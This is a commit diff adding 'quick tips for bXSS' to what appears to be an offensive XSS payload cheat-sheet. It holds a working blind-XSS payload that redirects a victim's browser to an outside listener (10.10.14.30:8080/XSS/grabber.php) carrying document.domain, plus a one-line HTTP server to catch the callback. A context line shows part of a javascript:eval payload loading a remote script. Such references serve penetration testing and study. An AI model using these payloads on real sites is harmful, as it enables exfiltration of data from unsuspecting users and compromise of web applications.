Merge pull request #376 from noraj/patch-2

XSS: add quick tips for bXSS
This commit is contained in:
Swissky 2021-06-16 13:56:29 +02:00 committed by GitHub
commit 62b897c936
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -452,6 +452,22 @@ javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursu
- Comment Box
- Administrative Panel
### Tips
You can use [Data grabber for XSS](#data-grabber-for-xss) and a one-line HTTP server to confirm the existence of a blind XSS before deploying an heavy blind XSS platform.
Eg. payload
```html
<script>document.location='http://10.10.14.30:8080/XSS/grabber.php?c='+document.domain</script>
```
Eg. one-line HTTP server:
```
$ ruby -run -ehttpd . -p8080
```
## Mutated XSS
Use browsers quirks to recreate some HTML tags when it is inside an `element.innerHTML`.